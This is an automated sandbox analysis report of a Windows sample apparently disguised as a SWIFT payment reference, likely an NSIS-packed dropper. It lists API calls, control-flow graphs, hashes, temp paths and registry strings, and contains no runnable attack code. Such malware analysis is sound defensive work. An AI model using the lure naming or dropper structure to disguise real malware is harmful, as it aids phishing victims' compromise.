                            • ShowWindow.USER32(?,00000004), ref: 00403FEB
                            • DestroyWindow.USER32 ref: 00403FFF
                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
                            • GetDlgItem.USER32(?,?), ref: 00404037
                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
                            • IsWindowEnabled.USER32(00000000), ref: 00404052
                            • GetDlgItem.USER32(?,00000001), ref: 004040FD
                            • GetDlgItem.USER32(?,00000002), ref: 00404107
                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404121
                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
                            • GetDlgItem.USER32(?,00000003), ref: 00404218
                            • ShowWindow.USER32(00000000,?), ref: 00404239
                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
                            • EnableWindow.USER32(?,?), ref: 00404266
                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
                            • EnableMenuItem.USER32(00000000), ref: 00404283
                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
                            • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
                            • SetWindowTextW.USER32(?,00423708), ref: 004042EC
                            • ShowWindow.USER32(?,0000000A), ref: 00404420
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                            • String ID:
                            • API String ID: 121052019-0
                            • Opcode ID: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
                            • Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
                            • Opcode Fuzzy Hash: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
                            • Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 301 403bb6-403bce call 4068d4 304 403bd0-403be0 call 40644e 301->304 305 403be2-403c19 call 4063d5 301->305 314 403c3c-403c65 call 403e8c call 405ede 304->314 310 403c31-403c37 lstrcatW 305->310 311 403c1b-403c2c call 4063d5 305->311 310->314 311->310 319 403cf7-403cff call 405ede 314->319 320 403c6b-403c70 314->320 326 403d01-403d08 call 406544 319->326 327 403d0d-403d32 LoadImageW 319->327 320->319 321 403c76-403c9e call 4063d5 320->321 321->319 328 403ca0-403ca4 321->328 326->327 330 403db3-403dbb call 40140b 327->330 331 403d34-403d64 RegisterClassW 327->331 332 403cb6-403cc2 lstrlenW 328->332 333 403ca6-403cb3 call 405e03 328->333 344 403dc5-403dd0 call 403e8c 330->344 345 403dbd-403dc0 330->345 334 403e82 331->334 335 403d6a-403dae SystemParametersInfoW CreateWindowExW 331->335 339 403cc4-403cd2 lstrcmpiW 332->339 340 403cea-403cf2 call 405dd6 call 406507 332->340 333->332 338 403e84-403e8b 334->338 335->330 339->340 343 403cd4-403cde GetFileAttributesW 339->343 340->319 348 403ce0-403ce2 343->348 349 403ce4-403ce5 call 405e22 343->349 354 403dd6-403df0 ShowWindow call 406864 344->354 355 403e59-403e5a call 40563c 344->355 345->338 348->340 348->349 349->340 362 403df2-403df7 call 406864 354->362 363 403dfc-403e0e GetClassInfoW 354->363 359 403e5f-403e61 355->359 360 403e63-403e69 359->360 361 403e7b-403e7d call 40140b 359->361 360->345 364 403e6f-403e76 call 40140b 360->364 361->334 362->363 367 403e10-403e20 GetClassInfoW RegisterClassW 363->367 368 403e26-403e49 DialogBoxParamW call 40140b 363->368 364->345 367->368 372 403e4e-403e57 call 403b06 368->372 372->338
                            APIs
                              • Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                              • Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                            • lstrcatW.KERNEL32(1033,00423708), ref: 00403C37
                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,74DF3420), ref: 00403CB7
                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
                            • GetFileAttributesW.KERNEL32(: Completed,?,00000000,?), ref: 00403CD5
                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne), ref: 00403D1E
                              • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                            • RegisterClassW.USER32(004291C0), ref: 00403D5B
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DA8
                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403E0A
                            • GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403E17
                            • RegisterClassW.USER32(004291C0), ref: 00403E20
                            • DialogBoxParamW.USER32(?,00000000,00403F64,00000000), ref: 00403E3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                            • API String ID: 1975747703-722751082
                            • Opcode ID: 6641f25268bcb411ff60996ee06ee97a96bb8d093e03f8a241686f6243dfe293
                            • Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
                            • Opcode Fuzzy Hash: 6641f25268bcb411ff60996ee06ee97a96bb8d093e03f8a241686f6243dfe293
                            • Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 405ff7 378 4030d7-403105 call 406507 call 405e22 call 406507 GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 403499 390->393 392->393 401 40325a-403262 call 403019 393->401 402 40313a-403141 393->402 397 403205-40321d call 4034af call 403499 394->397 398 403227-403251 GlobalAlloc call 4034af call 4032b4 394->398 395->380 397->395 423 40321f-403225 397->423 398->395 421 403264-403275 398->421 401->395 406 403143-403157 call 405fb2 402->406 407 4031bd-4031c1 402->407 412 4031cb-4031d1 406->412 426 403159-403160 406->426 411 4031c3-4031ca call 403019 407->411 407->412 411->412 418 4031e0-4031e8 412->418 419 4031d3-4031dd call 4069c1 412->419 418->390 422 4031ee 418->422 419->418 428 403277 421->428 429 40327d-403282 421->429 422->387 423->395 423->398 426->412 427 403162-403169 426->427 427->412 431 40316b-403172 427->431 428->429 432 403283-403289 429->432 431->412 433 403174-40317b 431->433 432->432 434 40328b-4032a6 SetFilePointer call 405fb2 432->434 433->412 435 40317d-40319d 433->435 438 4032ab 434->438 435->395 437 4031a3-4031a7 435->437 439 4031a9-4031ad 437->439 440 4031af-4031b7 437->440 438->380 439->422 439->440 440->412 441 4031b9-4031bb 440->441 441->412
                            APIs
                            • GetTickCount.KERNEL32 ref: 0040308E
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA
                              • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                              • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
                            • GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                            • API String ID: 2803837635-3212485321
                            • Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                            • Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
                            • Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                            • Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 506 406544-40654f 507 406551-406560 506->507 508 406562-406578 506->508 507->508 509 406590-406599 508->509 510 40657a-406587 508->510 512 406774-40677f 509->512 513 40659f 509->513 510->509 511 406589-40658c 510->511 511->509 515 406781-406785 call 406507 512->515 516 40678a-40678b 512->516 514 4065a4-4065b1 513->514 514->512 517 4065b7-4065c0 514->517 515->516 519 406752 517->519 520 4065c6-406603 517->520 521 406760-406763 519->521 522 406754-40675e 519->522 523 4066f6-4066fb 520->523 524 406609-406610 520->524 525 406765-40676e 521->525 522->525 526 4066fd-406703 523->526 527 40672e-406733 523->527 528 406612-406614 524->528 529 406615-406617 524->529 525->512 530 4065a1 525->530 531 406713-40671f call 406507 526->531 532 406705-406711 call 40644e 526->532 535 406742-406750 lstrlenW 527->535 536 406735-40673d call 406544 527->536 528->529 533 406654-406657 529->533 534 406619-406637 call 4063d5 529->534 530->514 547 406724-40672a 531->547 532->547 537 406667-40666a 533->537 538 406659-406665 GetSystemDirectoryW 533->538 548 40663c-406640 534->548 535->525 536->535 544 4066d3-4066d5 537->544 545 40666c-40667a GetWindowsDirectoryW 537->545 543 4066d7-4066db 538->543 551 4066dd-4066e1 543->551 552 4066ee-4066f4 call 40678e 543->552 544->543 550 40667c-406684 544->550 545->544 547->535 549 40672c 547->549 548->551 553 406646-40664f call 406544 548->553 549->552 557 406686-40668f 550->557 558 40669b-4066b1 SHGetSpecialFolderLocation 550->558 551->552 554 4066e3-4066e9 lstrcatW 551->554 552->535 553->543 554->552 563 406697-406699 557->563 561 4066b3-4066cd SHGetPathFromIDListW CoTaskMemFree 558->561 562 4066cf 558->562 561->543 561->562 562->544 563->543 563->558
                            APIs
                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040665F
                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004055A0,Completed,00000000,00000000,00418EC0,00000000), ref: 00406672
                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                            • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Directory$SystemWindowslstrcatlstrlen
                            • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                            • API String ID: 4260037668-905382516
                            • Opcode ID: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
                            • Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
                            • Opcode Fuzzy Hash: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
                            • Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 564 40176f-401794 call 402da6 call 405e4d 569 401796-40179c call 406507 564->569 570 40179e-4017b0 call 406507 call 405dd6 lstrcatW 564->570 575 4017b5-4017b6 call 40678e 569->575 570->575 579 4017bb-4017bf 575->579 580 4017c1-4017cb call 40683d 579->580 581 4017f2-4017f5 579->581 588 4017dd-4017ef 580->588 589 4017cd-4017db CompareFileTime 580->589 582 4017f7-4017f8 call 405fd2 581->582 583 4017fd-401819 call 405ff7 581->583 582->583 591 40181b-40181e 583->591 592 40188d-4018b6 call 405569 call 4032b4 583->592 588->581 589->588 593 401820-40185e call 406507 * 2 call 406544 call 406507 call 405b67 591->593 594 40186f-401879 call 405569 591->594 604 4018b8-4018bc 592->604 605 4018be-4018ca SetFileTime 592->605 593->579 626 401864-401865 593->626 606 401882-401888 594->606 604->605 608 4018d0-4018db CloseHandle 604->608 605->608 609 402c33 606->609 611 4018e1-4018e4 608->611 612 402c2a-402c2d 608->612 613 402c35-402c39 609->613 616 4018e6-4018f7 call 406544 lstrcatW 611->616 617 4018f9-4018fc call 406544 611->617 612->609 623 401901-4023a2 call 405b67 616->623 617->623 623->612 623->613 626->606 628 401867-401868 626->628 628->594
                            APIs
                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                            • CompareFileTime.KERNEL32(-00000014,?,%tjur%\Underafsnitets7\pothouses,%tjur%\Underafsnitets7\pothouses,00000000,00000000,%tjur%\Underafsnitets7\pothouses,00436000,?,?,00000031), ref: 004017D5
                              • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                              • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                              • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                              • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED), ref: 004055C4
                              • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                              • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                            • String ID: %tjur%\Underafsnitets7\pothouses$C:\Users\user\AppData\Local\Temp\nso1577.tmp$Software\nekton\plastrendes
                            • API String ID: 1941528284-2891651852
                            • Opcode ID: 7ab0603ab804afdab1fb2c728dca1342c41c6ca15f865d7c0f8a57fc8b40d4ea
                            • Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
                            • Opcode Fuzzy Hash: 7ab0603ab804afdab1fb2c728dca1342c41c6ca15f865d7c0f8a57fc8b40d4ea
                            • Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 630 405569-40557e 631 405584-405595 630->631 632 405635-405639 630->632 633 4055a0-4055ac lstrlenW 631->633 634 405597-40559b call 406544 631->634 636 4055c9-4055cd 633->636 637 4055ae-4055be lstrlenW 633->637 634->633 639 4055dc-4055e0 636->639 640 4055cf-4055d6 SetWindowTextW 636->640 637->632 638 4055c0-4055c4 lstrcatW 637->638 638->636 641 4055e2-405624 SendMessageW * 3 639->641 642 405626-405628 639->642 640->639 641->642 642->632 643 40562a-40562d 642->643 643->632
                            APIs
                            • lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                            • lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                            • lstrcatW.KERNEL32(Completed,004033ED), ref: 004055C4
                            • SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                              • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                              • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                            • String ID: Completed
                            • API String ID: 1495540970-3087654605
                            • Opcode ID: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
                            • Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
                            • Opcode Fuzzy Hash: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
                            • Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 644 4032b4-4032cb 645 4032d4-4032dc 644->645 646 4032cd 644->646 647 4032e3-4032e8 645->647 648 4032de 645->648 646->645 649 4032f8-403305 call 403499 647->649 650 4032ea-4032f3 call 4034af 647->650 648->647 654 403450 649->654 655 40330b-40330f 649->655 650->649 658 403452-403453 654->658 656 403315-403335 GetTickCount call 406a2f 655->656 657 403439-40343b 655->657 668 40348f 656->668 670 40333b-403343 656->670 659 403484-403488 657->659 660 40343d-403440 657->660 662 403492-403496 658->662 663 403455-40345b 659->663 664 40348a 659->664 665 403442 660->665 666 403445-40344e call 403499 660->666 671 403460-40346e call 403499 663->671 672 40345d 663->672 664->668 665->666 666->654 677 40348c 666->677 668->662 674 403345 670->674 675 403348-403356 call 403499 670->675 671->654 680 403470-40347c call 4060a9 671->680 672->671 674->675 675->654 683 40335c-403365 675->683 677->668 686 403435-403437 680->686 687 40347e-403481 680->687 685 40336b-403388 call 406a4f 683->685 690 403431-403433 685->690 691 40338e-4033a5 GetTickCount 685->691 686->658 687->659 690->658 692 4033f0-4033f2 691->692 693 4033a7-4033af 691->693 696 4033f4-4033f8 692->696 697 403425-403429 692->697 694 4033b1-4033b5 693->694 695 4033b7-4033ed MulDiv wsprintfW call 405569 693->695 694->692 694->695 695->692 700 4033fa-4033ff call 4060a9 696->700 701 40340d-403413 696->701 697->670 698 40342f 697->698 698->668 705 403404-403406 700->705 704 403419-40341d 701->704 704->685 706 403423 704->706 705->686 707 403408-40340b 705->707 706->668 707->704
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CountTick$wsprintf
                            • String ID: ... %d%%$G8@
